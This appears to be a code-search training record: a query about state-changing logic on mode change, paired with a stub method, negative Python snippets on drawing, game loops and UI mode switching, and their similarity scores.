self.tip_vec1[2]+self.arrow_len*tangent_vec1[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"b\")\n anormal1 = Arrow3D([self.tip_vec1[0], self.tip_vec1[0]+self.arrow_len*normal_vec1[0]],\n [self.tip_vec1[1], self.tip_vec1[1]+self.arrow_len*normal_vec1[1]],\n [self.tip_vec1[2], self.tip_vec1[2]+self.arrow_len*normal_vec1[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"r\")\n abinormal1 = Arrow3D([self.tip_vec1[0], self.tip_vec1[0]+self.arrow_len*binormal_vec1[0]],\n [self.tip_vec1[1], self.tip_vec1[1]+self.arrow_len*binormal_vec1[1]],\n [self.tip_vec1[2], self.tip_vec1[2]+self.arrow_len*binormal_vec1[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"g\")\n self.ax.add_artist(atangent1)\n self.ax.add_artist(anormal1)\n self.ax.add_artist(abinormal1)\n # add dynamic coordinate frenet frame of segment 2 tip\n atangent2 = Arrow3D([self.tip_vec2[0], self.tip_vec2[0]+self.arrow_len*tangent_vec2[0]],\n [self.tip_vec2[1], self.tip_vec2[1]+self.arrow_len*tangent_vec2[1]],\n [self.tip_vec2[2], self.tip_vec2[2]+self.arrow_len*tangent_vec2[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"b\")\n anormal2 = Arrow3D([self.tip_vec2[0], self.tip_vec2[0]+self.arrow_len*normal_vec2[0]],\n [self.tip_vec2[1], self.tip_vec2[1]+self.arrow_len*normal_vec2[1]],\n [self.tip_vec2[2], self.tip_vec2[2]+self.arrow_len*normal_vec2[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"r\")\n abinormal2 = Arrow3D([self.tip_vec2[0], self.tip_vec2[0]+self.arrow_len*binormal_vec2[0]],\n [self.tip_vec2[1], self.tip_vec2[1]+self.arrow_len*binormal_vec2[1]],\n [self.tip_vec2[2], self.tip_vec2[2]+self.arrow_len*binormal_vec2[2]],\n arrowstyle=\"-|>\", lw=1, mutation_scale=10, color=\"g\")\n self.ax.add_artist(atangent2)\n self.ax.add_artist(anormal2)\n self.ax.add_artist(abinormal2)\n# goal_vec = (self.goal-self.tip_vec2)/np.linalg.norm(self.goal-self.tip_vec2)\n# agoal = Arrow3D([self.tip_vec2[0], self.tip_vec2[0]+self.arrow_len*goal_vec[0]],\n# [self.tip_vec2[1], self.tip_vec2[1]+self.arrow_len*goal_vec[1]],\n# [self.tip_vec2[2], self.tip_vec2[2]+self.arrow_len*goal_vec[2]],\n# arrowstyle=\"fancy\", lw=0.5, mutation_scale=15, color=\"magenta\")\n# self.ax.add_artist(agoal)\n mypause(pause) # pause video without losing focus of current window\n # save frames of plot if asked\n if save_frames == True:\n filename = \"figures/frame\"+str(self.frame)[1:]+\".png\"\n self.fig.savefig(filename)\n self.frame += 1", "def do_animations(self):\n self.animate_bloop(700, 160, 50)", "def _draw(self):\r\n \r\n if self.active:\r\n self.surface = self.activeSurface # Set active surface to be displayed.\r\n else:\r\n self.surface = self.passiveSurface # Set passive surface to be displayed.\r", "def run(self):\n while not self.done:\n dt = self.clock.tick(self.fps)\n self.event_loop()\n self.update(dt)\n self.draw()\n pygame.display.flip()\n # pygame.display.update() # can be used to update only part of the screen", "def draw(self, surface, force=False):\n if self.redraw or force:\n surface.blit(self.image, self.loc)\n self.redraw = False", "def draw(self):\n\n super().draw()\n\n if self.hit or self.miss:\n # Change colour depending on hit or miss\n fl_color(FL_RED if self.hit else FL_WHITE)\n fl_pie(self.x()+4, self.y()+4, self.w() - 8, self.h() - 8, 0.0, 360.0)", "def redraw(self):\n raise NotImplementedError()", "def draw(self):\r\n try:\r\n self.sprite.draw()\r\n except:\r\n return -1", "def draw(self):\n pg.display.set_caption(\"{:.2f}\".format(self.clock.get_fps()))\n\n \n\n if distance(self.player.pos, self.monster.pos)<MONSTER_BUBBLE_DISTANCE:\n now=pg.time.get_ticks()\n if self.fuzz:\n wait=NOISE_DURATION\n else:\n wait=NOISE_TIMESTEP #change to a function of distance to monster\n if now - self.last_update_noise>wait:\n self.last_update_noise=now\n if self.fuzz:\n self.map_img2=self.map_img\n else:\n self.map_img2=self.noisy_map_img\n #make static sound\n self.fuzz=not self.fuzz\n else:\n self.map_img2=self.map_img\n self.fuzz=False\n\n self.screen.blit(self.map_img2, self.camera.apply_rect(self.map_rect))\n\n # Layer player and monsters on map\n for sprite in self.moving_sprites:\n self.screen.blit(sprite.image, self.camera.apply(sprite))\n if self.draw_debug:\n pg.draw.rect(self.screen, LIGHTBLUE, self.camera.apply_rect(sprite.hit_rect), 1)\n \n if self.draw_debug:\n for wall in self.walls:\n pg.draw.rect(self.screen, LIGHTBLUE, self.camera.apply_rect(wall.rect), 1)\n for mirror in self.teleports:\n pg.draw.rect(self.screen, LIGHTBLUE, self.camera.apply_rect(mirror.rect), 1)\n for goal in self.win:\n pg.draw.rect(self.screen, LIGHTBLUE, self.camera.apply_rect(goal.rect), 1)\n dest=(self.monster.next_step[0]*TILESIZE, self.monster.next_step[1]*TILESIZE)\n next_step=pg.Rect(0, 0, 20, 20)\n next_step.center=dest\n pg.draw.rect(self.screen, LIGHTBLUE, self.camera.apply_rect(next_step), 1)\n \n for sprite in self.static_sprites:\n self.screen.blit(sprite.image, sprite.rect)\n pg.display.flip() #update the full display surface to the screen", "def _step(self) -> bool:\n\n total_run_time_begin = time.time()\n\n try:\n self.compiled_code_run_time += CC3DPy.call_step(self._current_step)\n except CompuCellSetup.CC3DCPlusPlusError as cc3d_cpp_err:\n self._error_message = cc3d_cpp_err.message\n return False\n\n CC3DPy.store_sim_step_data(self._current_step)\n if not self._check_cc3d():\n self.status = SimStatus.SIM_FAILED\n return False\n\n try:\n CC3DPy.call_steer(self._current_step) # Need an interface to write XML-based data in Python\n self._check_cc3d() # Test if this is necessary\n except CompuCellSetup.CC3DCPlusPlusError as cc3d_cpp_err:\n self._error_message = cc3d_cpp_err.message\n self.status = SimStatus.SIM_FAILED\n return False\n\n for frame_c in self._graphics_frames:\n if self._current_step % frame_c.plot_freq == 0:\n frame_c.frame.draw(blocking=frame_c.blocking)\n\n total_run_time_end = time.time()\n self.total_run_time += (total_run_time_end - total_run_time_begin) * 1000\n\n return True", "def __call__(self,duration=np.inf):\n\n clock = core.Clock()\n t=0\n while t<duration: #Keep going for the duration\n t=clock.getTime()\n\n self.text.draw()\n self.win.flip()\n\n for key in event.getKeys():\n if key:\n return" ]
[ "0.78179634", "0.68488324", "0.6405945", "0.6315539", "0.6288791", "0.6209565", "0.6140665", "0.6124815", "0.6104606", "0.60049677", "0.5990784", "0.59893525", "0.5976392", "0.5976392", "0.5976392", "0.5976392", "0.59686214", "0.5960046", "0.5932858", "0.5920046", "0.59116364", "0.58809614", "0.58726156", "0.5864331", "0.58313143", "0.5804074", "0.57993144", "0.5795677", "0.5792726", "0.57680404", "0.57530415", "0.57518524", "0.57496196", "0.57459897", "0.57459897", "0.57459897", "0.57411", "0.5729694", "0.57209957", "0.571198", "0.57046", "0.5691893", "0.5689124", "0.56883013", "0.56832886", "0.5679455", "0.5678897", "0.56740826", "0.56676096", "0.56612766", "0.56609094", "0.5633936", "0.56336266", "0.5631699", "0.56188375", "0.55971926", "0.5595678", "0.558884", "0.5588339", "0.55827945", "0.5581188", "0.5560601", "0.5555434", "0.5555183", "0.55541885", "0.55535454", "0.5550223", "0.55468017", "0.5540985", "0.5531774", "0.55272686", "0.55241776", "0.5516332", "0.551618", "0.5509836", "0.5508807", "0.5498404", "0.5495033", "0.5488104", "0.5485799", "0.54825723", "0.5481711", "0.5481583", "0.5481094", "0.5477826", "0.5477204", "0.5477031", "0.5475843", "0.54628295", "0.5461274", "0.5458751", "0.54514664", "0.5450611", "0.5448084", "0.5445917", "0.54455215", "0.5440772", "0.5431003", "0.54299474", "0.5417894" ]
0.8034474
0
Implement your state changing logic here, for example, when a mode is changed
def refresh(self, new_content): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _on_mode_change(self, event):\n mode = event.mode\n if mode == Mode.PAN_ZOOM:\n self.panzoom_button.setChecked(True)\n elif mode == Mode.PICKER:\n self.pick_button.setChecked(True)\n elif mode == Mode.PAINT:\n self.paint_button.setChecked(True)\n elif mode == Mode.FILL:\n self.fill_button.setChecked(True)\n else:\n raise ValueError(\"Mode not recognized\")", "def set_state( self ):", "def _state_cb(self, msg):\n if self.current_mode == '':\n self.current_mode = msg.mode\n self.state = msg", "def _on_mode_change(self, event_name: str, data: dict, kwargs: dict) -> None:\n mode = data[\"name\"]\n\n if data[\"state\"] == \"on\":\n self.mode_events.append(mode)\n elif mode in self.mode_events:\n self.mode_events.remove(mode)\n\n try:\n primary = max(\n (m for m in self.mode_alterations if m[\"mode\"] in self.mode_events),\n key=lambda m: m[\"priority\"],\n )\n except ValueError:\n try:\n primary = next((m for m in self.mode_alterations if m[\"mode\"] == mode))\n except StopIteration:\n return\n\n if primary[\"action\"] == \"enable\":\n primary[\"action\"] = \"disable\"\n else:\n primary[\"action\"] = \"enable\"\n\n # If the primary mode alteration prescribes an action that matches the state the\n # app is already in, return:\n if (self.enabled and primary[\"action\"] == \"enable\") or (\n not self.enabled and primary[\"action\"] == \"disable\"\n ):\n return\n\n if primary[\"action\"] == \"enable\":\n self.enable()\n else:\n self.disable()", "def __stateFrameBas(self, mode):\n self.__btnReset.config(state = mode)\n self.__champBind.config(state = mode)\n self.__listConflit.config(state = mode)", "def set_mode(self,mode,state=True):\n\t\tprint \"SET_MODE START\"\n\t\tfor key,val in self.ms_all.iteritems():\n\t\t\tif val.index(mode) is not None:\n\t\t\t\tif state:\n\t\t\t\t\tval.activate( val.index(mode) )\n\t\t\t\telse:\n\t\t\t\t\tval.deactivate( val.index(mode) )\n\t\t\"\"\"\n\t\tprint \"SET_MODE DONE -- ALSO DOING EXPERIMENTAL -- \"\n\t\t# DEBUG / EXPERIMENTAL\n\t\tif self.int_encoder is not None:\n\t\t\tif mode == 'volume' and state == True and 'mode_timeout' in self.cfg_gpio and self.int_enabled:\n\t\t\t\tprint \"DEBUG2.. GPIO/VOLUME ({0}:{1}).. disabling our interrupts..\".format(mode,state)\n\t\t\t\tself.gpio.remove_event_detect(13)\n\t\t\t\tself.gpio.remove_event_detect(6)\n\t\t\t\tself.int_enabled = False\n\t\t\telif mode != 'volume' and state == True and 'mode_timeout' in self.cfg_gpio and not self.int_enabled:\n\t\t\t\tprint \"DEBUG2.. GPIO/NOT VOLUME ({0}:{1}).. enabling our interrupts..\".format(mode,state)\n\t\t\t\tself.gpio.setup((13,6), self.gpio.IN, pull_up_down=self.gpio.PUD_DOWN)\n\t\t\t\tself.gpio.add_event_detect(13, self.gpio.RISING, callback=self.int_encoder) # NO bouncetime \n\t\t\t\tself.gpio.add_event_detect(6, self.gpio.RISING, callback=self.int_encoder) # NO bouncetime\n\t\t\t\tself.int_enabled = True\n\t\t\telif mode == 'volume' and state == True and 'mode_timeout' not in self.cfg_gpio and not self.int_enabled:\n\t\t\t\tprint \"DEBUG2.. ECA/VOLUME ({0}:{1}).. enabling our interrupts..\".format(mode,state)\n\t\t\t\tself.gpio.setup((13,6), self.gpio.IN, pull_up_down=self.gpio.PUD_DOWN)\n\t\t\t\tself.gpio.add_event_detect(13, self.gpio.RISING, callback=self.int_encoder) # NO bouncetime \n\t\t\t\tself.gpio.add_event_detect(6, self.gpio.RISING, callback=self.int_encoder) # NO bouncetime\n\t\t\t\tself.int_enabled = True\n\t\t\telif mode != 'volume' and state == True and 'mode_timeout' not in self.cfg_gpio and self.int_enabled:\n\t\t\t\tprint \"DEBUG2.. ECA/NOT VOLUME ({0}:{1}).. disabling our interrupts..\".format(mode,state)\n\t\t\t\tself.gpio.remove_event_detect(13)\n\t\t\t\tself.gpio.remove_event_detect(6)\n\t\t\t\tself.int_enabled = False\n\t\t\tprint \"DEBUG2.. done\"\n\t\t\"\"\"", "def state_chosen_do(cfg, app, win, events):", "def _mode_changed(hass, entity_id=None, old_state=None, new_state=None):\n PERSIST['mode'] = str(new_state.state)\n PERSIST['last_cmd'] = None\n _eval_state(hass)", "def _combo_mode_changed(self, *a):\r\n \r\n # Get the current mode.\r\n mode = self.api.get_mode()\r\n \r\n # Update the machine if the combo mode doesn't match\r\n if not mode == self.combo_mode.get_text():\r\n self.api.set_mode(self.combo_mode.get_text())\r\n \r\n # Get the mode again, to make sure it still matches.\r\n if self.api.get_mode() == 'List': \r\n self.combo_mode.set_index(1, block_events=True).enable()\r\n self.number_list_index.set_value(self.api.get_list_index(), block_events=True).enable()\r\n self._number_list_index_changed()\r\n self.number_frequency.disable() #Disable the frequency button\r\n self.number_dbm.disable() #Disable the dbm button\r\n else: \r\n #It is in fixed mode and we update the value of the button\r\n self.combo_mode.set_index(0, block_events=True).enable()\r\n self.number_frequency.set_value(self.api.get_frequency()).enable()\r\n self.number_dbm .set_value(self.api.get_power()).enable()\r\n self.number_list_index.disable() #Change the list index. \r", "def handleModeToggle(self):\n self.filesList.changeMode(not self.autoMode)\n if self.autoMode:\n self.modeToggle.setText(\"Auto Mode\")\n self.mainWindow.setWindowTitle(\"CMAT (Manual Mode)\")\n else:\n self.modeToggle.setText(\"Manual Mode\")\n self.mainWindow.setWindowTitle(\"CMAT (Auto Mode)\")\n self.autoMode = not self.autoMode", "def update_state(self):\n if not self.platforms:\n self.state = self.states['Win']\n elif self.player.y > 389:\n self.state = self.states['Lose'] \n else:\n self.state = self.states['Game']", "def tempo_mode_switch(event):\n value = gremlin.actions.Value(event.is_pressed)\n tempo_mode_switch_container(event, value)", "def setMode(self,mode):\n self.mode=mode\n if self.mode==0:\n self.setDrawing()\n elif self.mode==1:\n self.setConstruction()\n elif self.mode==2:\n self.setDisplay()\n self.context.text.append(\"mode: \"+self.messages[self.mode])", "def notify_mode_change(self, mode):\n pass", "def state_processing_do(cfg, app, win, events):", "def change_state(self):\n new_state = 0 if self.state.state == 1 else 1\n answer = UsbHost.send_query(self.state.ser, \"SetState\", str(self.state.device_id), new_state)\n if answer in wrong_answers:\n error_message(\"Не удалось сменить состояние\")\n self.statusbar.showMessage(answer_translate[answer])\n else:\n self.statusbar.clearMessage()\n self.state.state = new_state\n if new_state == 1:\n self.set_auto_active()\n if new_state == 0:\n self.set_hand_active()", "def state_choose_do(cfg, app, win, events):", "def state_changed(self, oldstate, newstate, event, *args, **kwargs):", "def state_changed(self, oldstate, newstate, event, *args, **kwargs):", "def set_state(self, state: int):", "def modes(self, mode):\n # Sends the update to the piston worker\n self.worker_piston.mode = mode\n if mode == 1: # 'VCV'\n self.VCV_start_btn.setEnabled(False)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 2: # 'PCV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(False)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 3: # 'PSV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(False)\n self.stop_btn.setEnabled(True)\n elif mode == 4: # 'Emergency'\n print('Emergency')\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)\n else: # STOP\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)", "def _on_toggle_and_run(self, kwargs: dict) -> None:\n self.toggle(state=kwargs[CONF_STATE])\n\n if kwargs[CONF_STATE] == \"on\":\n state = \"off\"\n else:\n state = \"on\"\n\n self.handles[HANDLE_VACATION_MODE] = self.run_in(\n self._on_toggle_and_run, randint(5 * 60, 60 * 60), state=state\n )", "def __cb_mode_change(self, list_of_modes):\t\n\t\t\n\t\tnew_active_modes = []\t\t# only the new active mode(s)\n\t\tmode_change_params = []\n\t\tfor mode in list_of_modes:\n\t\t\tmode_change_params.append(mode['mode'])\n\t\t\tmode_change_params.append(mode['state'])\n\t\t\tif mode['state']:\n\t\t\t\tnew_active_modes.append(mode['mode'])\n\n\t\tself.__printer(\"Mode change. {0}\".format(mode_change_params),level=LL_DEBUG)\n\t\tself.__exec_function_by_code('MODE-CHANGE',*mode_change_params)\n\t\t\n\t\tif callable(self.callback_mode_change):\n\t\t\tself.callback_mode_change(mode_change_params)\n\t\t\n\t\t# Check if we have an event for this..\n\t\tif self.event_mode_change:\n\t\t\n\t\t\tfor emc in self.event_mode_change:\n\t\t\t\tif any(x in new_active_modes for x in emc['modes']):\n\t\t\t\t\t\n\t\t\t\t\t# TODO! check if ['type'] == 'mode_change'\n\t\t\t\t\t\n\t\t\t\t\tfor active_mode in new_active_modes:\n\t\t\t\t\t\tif active_mode in emc['modes']:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\trgb_dev = self.get_device_config(emc['device'])\n\t\t\t\t\t\t\tpin_r = rgb_dev['r']\n\t\t\t\t\t\t\tpin_g = rgb_dev['g']\n\t\t\t\t\t\t\tpin_b = rgb_dev['b']\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# ignore pattern for now..\n\t\t\t\t\t\t\t#turn on rgb_1, using ff0000\n\t\t\t\t\t\t\tself.gpio.pwm_rgb(pin_r,pin_g,pin_b,emc['rgb'])", "def update_state(self, context):\n pass", "def _update_state(self) -> None:\n raise NotImplementedError(\"\")", "def mode_changed_callback(self, entity, attribute, old, new, kwargs):\n\n entity_dict = kwargs['entity_dict']\n self.log('{} mode changed to {}.'.format(entity_dict['friendly'], new))\n\n if new == 'Maximum':\n self.turn_on(entity_dict['light'],\n brightness_pct=entity_dict['max_brightness'])\n self.log('Setting {} to {}% brightness.'.format(\n entity_dict['friendly'], entity_dict['max_brightness']))\n elif new == 'Minimum':\n self.turn_on(entity_dict['light'],\n brightness_pct=entity_dict['min_brightness'])\n self.log('Setting {} to {}% brightness.'.format(\n entity_dict['friendly'], entity_dict['min_brightness']))\n elif new == 'Automatic':\n self.set_value(entity_dict['setpoint'], value=0)\n self.auto_brightness_callback(\n dict(entity_dict=entity_dict))", "def check_manual_mode_change(self, event):\n if self.vehicle.get_manual_mode_change(reset=True):\n data = lambda: None\n data.mode_to_set = \"Inactive\"\n self.set_companion_mode(data)", "def _updateState(self):\n\n self.changeColorBtn.setEnabled(self.transformTypeCbx.isChecked() or self.shapeTypeCbx.isChecked())", "def state_preview_do(cfg, app, win, events):", "def state_changed(self):\n if self.goto and self.get_position() != self.c.p:\n self.goto_node()\n\n if self.mode == 'edit':\n self.edit_frame.show()\n self.view_frame.hide()\n elif self.mode == 'view':\n self.edit_frame.hide()\n self.view_frame.show()\n else:\n self.edit_frame.show()\n self.view_frame.show()\n\n self.update_position(self.c.p)", "def switch_state():\n\tDmg.OpenWindow()", "def __toggle_mode(self):\n # Update mode\n # Update mode, default canvas controls\n self.__ui_mode = {\n UImode.CANVASCONTROL: UImode.TEACHPANEL,\n UImode.TEACHPANEL: UImode.CANVASCONTROL\n }.get(self.__ui_mode, UImode.CANVASCONTROL)\n\n # Update UI\n # get list of robots\n new_list = []\n for name in self.__ui_controls.get('menu_robots').choices:\n new_list.append(name)\n\n self.__reload_caption(new_list)", "def _SetMode(self, newmode, msg):\n self.buffer = u'' # Clear buffer from last mode\n self.mode = newmode\n # Update status bar\n evt = ed_event.StatusEvent(ed_event.edEVT_STATUS, self.stc.GetId(),\n msg, ed_glob.SB_BUFF)\n wx.PostEvent(self.stc.GetTopLevelParent(), evt)", "def on_state_change(self, new_state):\n self.state = new_state", "def run_states(self):\n if (self.state == \"off\"):\n if (self.in_power.value == 1):\n self.off_to_on()\n \n elif self.state == \"on\":\n if (self.in_power.value == 0):\n self.any_to_off()\n elif (self.in_alert.value == 1):\n self.on_to_alert()\n \n elif self.state == \"alert\":\n if (self.in_power.value == 0):\n self.any_to_off()\n elif (self.in_alert.value == 0):\n self.alert_to_was_alert()\n\n elif self.state == \"was_alert\":\n if (self.in_power.value == 0):\n self.any_to_off()", "def __change_state(self, state):\n self.state = state", "def setMode(self, mode):\n self.mode = mode\n if self.mode == 0:\n self.setDrawingMode()\n elif self.mode == 1:\n self.setConstructionMode()\n elif self.mode == 2:\n self.setDisplayMode()\n self.context.text.append(\"mode: \" + self.messages[self.mode])", "def state_cb(self, msg):\n self.prev_state = deepcopy(self.current_state)\n self.current_state = msg\n\n if self.current_state.mode == \"MANUAL\":\n if self.offboard_point_streaming:\n rospy.loginfo(\"Setpoint stream DISABLED\")\n self.stop_streaming_offboard_points()\n\n if self.current_state.mode == \"POSCTL\":\n if not self.offboard_point_streaming:\n rospy.loginfo(\"Setpoint stream ENABLED\")\n self.start_streaming_offboard_points()\n if not self.prev_state.mode == \"POSCTL\":\n # just switched into POSCTL, call hover\n self.hover()\n\n if self.current_state.mode == \"OFFBOARD\":\n if not self.prev_state.mode == \"OFFBOARD\":\n # just switched to OFFBOARD, call move\n rospy.loginfo(\"Entering OFFBOARD Mode\")\n for i in range(0,len(velocities)):\n maneuver_velocity_setpoint=velocities[i]\n maneuver_reference_frame = maneuver_reference_Frame\n maneuver_duration=duration[i]\n self.execute_maneuver( self.maneuver_velocity_setpoint, \n self.maneuver_reference_frame, \n self.maneuver_duration)", "def _change_mode(self, new_mode: MODES):\n # Deactivate old mode_handler:\n self.mode_handler.deactivate()\n self.mode_handler = self.MODE_HANDLER[new_mode](self)\n self._set_tooltip(new_mode)", "def set_old_states(modes):\n for mode in modes:\n if mode['name'] in old_modes_states:\n mode['state'] = old_modes_states[mode['name']]\n if mode.get('sub'):\n set_old_states(mode['sub'])", "def on_mode_changed(self):\n\n if self.mode.currentText() != self.ScaleCustom:\n self.width.setEnabled(False)\n self.height.setEnabled(False)\n self.resolution.hide()\n else:\n self.width.setEnabled(True)\n self.height.setEnabled(True)\n self.resolution.show()", "def mode(self, value):\r\n if value != self._mode:\r\n if str(value).lower() == 'edit':\r\n if self._mode == 'read':\r\n self.stop_reading()\r\n self._mode = 'edit'\r\n self.start_editing()\r\n elif str(value).lower() == 'read':\r\n if self._mode == \"edit\":\r\n self.stop_editing(save=False)\r\n self._mode = \"read\"\r\n elif value is None:\r\n if self._mode == 'edit':\r\n self.stop_editing(save=False)\r\n elif self._mode == 'read':\r\n self.stop_reading()", "def temporary_mode_switch(event, value, condition, mode):\n if value.current:\n release_exec.register(\n gremlin.control_action.switch_to_previous_mode,\n event\n )\n gremlin.control_action.switch_mode(mode)", "def set_mode(self, mode):\n self.mode = mode\n self.btn_mode.setText(f\"{mode.title()}\\u25BE\")\n self.state_changed()", "def __set_mode(self, value):\n # update Nuke\n localization.setMode(str(value.lower()))\n # update panel UI\n logger.debug('disabling pause button: %s', value=='Off')\n # if the localization mode is off diasble pause and force widgets\n self.pauseBtn.setDisabled(value == 'Off')\n self.updateBtn.setDisabled(value == 'Off')\n self.__update_pause_icon()", "def change_state(self, state, interface=None):\n \n self._state = state\n if interface != None:\n self._interface = interface\n \n if self._state == config.GS_LOADING:\n \n # Background with loading text\n self._background = self._pygame.Surface(self._screen.get_size())\n self._background = self._background.convert()\n self._background.fill((0, 0, 0))\n draw_text(self._background, (180, 180), 'Loading...', 36,\n self._white, self._pygame)\n \n elif self._state == config.GS_GAME:\n \n # Background with static text\n self._background = self._pygame.Surface(self._screen.get_size())\n self._background = self._background.convert()\n self._background.fill((0, 0, 0))\n \n draw_text(self._background, (410, 130), 'Score:', 10,\n self._white, self._pygame)\n draw_text(self._background, (410, 190), 'Lines Cleared:', 10,\n self._white, self._pygame)\n \n next_text = 'Next ' + \\\n config.names[self._interface.get_order()].title() + ':'\n draw_text(self._background, (410, 250), next_text, 10,\n self._white, self._pygame)\n \n # Grid\n w = 210 + 10 - self._interface.get_field().get_size()[0] + 1\n h = 420 + 10 - self._interface.get_field().get_size()[1] + 1\n self._grid = self._pygame.Surface((w, h))\n self._grid = self._grid.convert()\n self._grid.fill((0, 0, 0))\n self._grid.set_colorkey((0, 0, 0))\n \n elif self._state in [config.GS_MENU, config.GS_MENU_ENTER_HIGHSCORE,\n config.GS_MENU_HIGHSCORES]:\n \n # Background with static text\n self._background = self._pygame.Surface(self._screen.get_size())\n self._background = self._background.convert()\n self._background.fill((0, 0, 0))\n \n draw_text(self._background, (110, 300), 'Settings:', 10,\n self._white, self._pygame)\n draw_text(self._background, (130, 340), 'Difficulty Level:', 10,\n self._white, self._pygame)\n draw_text(self._background, (130, 400), 'Polyomino Order:', 10,\n self._white, self._pygame)\n \n draw_text(self._background, (370, 300), 'Audio:', 10,\n self._white, self._pygame)\n draw_text(self._background, (400, 340), 'Sound Effects:', 10,\n self._white, self._pygame)\n draw_text(self._background, (400, 400), 'Music:', 10,\n self._white, self._pygame)\n \n # Buttons\n self._buttons = {}\n start_game_button = Button('Start Game', 10, (90, 150))\n self._buttons.update({config.MENU_START: start_game_button})\n view_highscores_button = Button('View Highscores', 10, (90, 180))\n self._buttons.update({config.MENU_HIGHSCORES: view_highscores_button})\n help_button = Button('Help', 10, (90, 210))\n self._buttons.update({config.MENU_HELP: help_button})\n quit_button = Button('Quit', 10, (90, 240))\n self._buttons.update({config.MENU_QUIT: quit_button})\n \n # Radio Selections\n self._radios = {}\n level_selection = Radio_Selection([str(n + 1) for n in range(9)],\n 10, (160, 365))\n self._radios.update({config.MENU_LEVEL: level_selection})\n order_selection = Radio_Selection([str(n + 1) for n in range(6)],\n 10, (160, 425))\n self._radios.update({config.MENU_ORDER: order_selection})\n sfx_selection = Radio_Selection(['On', 'Off'], 10, (435, 365))\n self._radios.update({config.MENU_SFX: sfx_selection})\n music_selection = Radio_Selection(['On', 'Off'], 10, (435, 425))\n self._radios.update({config.MENU_MUSIC: music_selection})\n \n # Highscores Screen\n self._highscores = self._pygame.Surface((250, 300))\n self._highscores = self._highscores.convert()\n self._highscores.fill((0, 0, 0))\n \n draw_text(self._highscores, (15, 10), 'Highscores:', 10,\n self._white, self._pygame)\n \n # Enter highscore name screen\n self._enterhighscore = self._pygame.Surface((250, 210))\n self._enterhighscore = self._enterhighscore.convert()\n self._enterhighscore.fill((0, 0, 0))\n self._name_entry = Text_Entry(3, ['A', 'A', 'A'], 20, (85, 105))\n \n # Help Screen\n self._help = self._pygame.Surface((410, 240))\n self._help = self._help.convert()\n self._help.fill((0, 0, 0))\n \n draw_text(self._help, (15, 10), 'Controls:', 10, self._white,\n self._pygame)\n draw_text(self._help, (205, 10), 'Instructions:', 10,\n self._white, self._pygame)\n \n draw_text(self._help, (20, 45), 'Up - Rotate', 10, self._white,\n self._pygame)\n draw_text(self._help, (20, 75), 'Left - Move Left', 10,\n self._white, self._pygame)\n draw_text(self._help, (20, 105), 'Right - Move Right', 10,\n self._white, self._pygame)\n draw_text(self._help, (20, 135), 'Down - Move Down', 10,\n self._white, self._pygame)\n draw_text(self._help, (20, 165), 'Space - Drop', 10, self._white,\n self._pygame)\n draw_text(self._help, (20, 195), 'Esc - Pause', 10, self._white,\n self._pygame)\n \n text = config.instructions\n rect = self._pygame.Rect(0, 0, 190, 190)\n instructions = render_textrect(text, 8, rect, self._white,\n (0, 0, 0), 0, self._pygame)\n self._help.blit(instructions, (210, 45))", "def state_chosen_enter(cfg, app, win):", "def state(self, state: str) -> None:", "def state_processing_enter(cfg, app, win):", "def _update_on_active(self):\n pass", "def set_state(self, state: ApplicationState) -> None:\n self.state = state\n if state == ApplicationState.IDLE:\n self.generate_cards.config(text=\"Generate Bingo Game\")\n elif state == ApplicationState.GENERATING_GAME:\n self.generate_cards.config(text=\"Stop Generating Game\")\n else: # state == ApplicationState.GAME_GENERATED\n self.generate_cards.config(text=\"Regenerate Game\")", "def update_to_state(self, game_state):\n pass", "def set_current_operation_mode(self, operation_mode):\n self._current_operation_mode = operation_mode\n \"\"\"Retrieve from textual representation\"\"\"\n if self._current_operation_mode == 'Off':\n self._api._opmode = 0;\n elif self._current_operation_mode == 'Heat only':\n self._api._opmode = 1;\n elif self._current_operation_mode == 'Cool only':\n self._api._opmode = 2;\n elif self._current_operation_mode == 'Heat & Cool':\n self._api._opmode = 3; \n self._api.set()\n self.schedule_update_ha_state()", "def state(self):\n pass", "def _select_mode(self):\n self.__check_mode()\n if self.mode[\"auto_mode\"]:\n self.mode_auto()\n elif self.mode[\"auto_mode\"] is None: # Do Nothing\n self.mode_standby()\n else:\n self.mode_manual()", "def state_preview_enter(cfg, app, win):", "def mode (self, mode) :\r\n self.mode_ = mode", "def change_state(self,state):\n if self.__currentState:\n self.__currentState.stop()\n \n try:\n idler=self[state]\n except KeyError:\n raise \"%s is not a state of %s\" % (state,self)\n \n self.__currentState=idler()\n self.__currentState.idle()\n self.__currentState=None", "def handle_state(self):\r\n if self.state == 'walk':\r\n self.walking()\r\n elif self.state == 'fall':\r\n self.falling()\r\n elif self.state == 'jumped on':\r\n self.jumped_on()\r\n elif self.state == 'shell slide':\r\n self.shell_sliding()\r\n elif self.state == 'death jump':\r\n self.death_jumping()", "def on_state_change(self, state):\n return state", "def set_state(self):\r\n if self.mode.get(): # write\r\n self.text.config(**self.textOpt)\r\n else:\r\n self.text.config(state=\"disabled\", bg=\"lightgrey\", fg=\"darkgrey\")\r\n if self.useEncryption.get(): # use AES\r\n self.keyEntry.config(**self.keyOpt)\r\n app.useAES = True\r\n else:\r\n self.keyEntry.config(state=\"disabled\")\r\n app.useAES = False\r\n length = app.parse_string(app.tmp)\r\n self.usedBytes.set(length)\r\n self.set_status()\r\n if self.loaded: # a file is loaded\r\n if self.mode.get() == 0: # read mode\r\n ok = True\r\n elif app.data != None and self.usedBytes.get() <= 